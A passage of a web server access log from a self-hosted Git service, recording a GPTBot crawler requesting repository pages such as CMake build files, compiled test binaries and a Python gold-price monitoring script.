(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17576] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14401] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" -[17/Feb/2026:16:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html" [Client 74.7.227.38] [Length 19789] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11031] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?files=html" [Client 74.7.227.38] [Length 15595] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13293] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:17:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11179] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10252] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21741] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21742] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21714] [Gzip 28.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21740] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33367] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14023] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11484] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10089] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42444] [Gzip 19.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21627] [Gzip 28.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10518] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 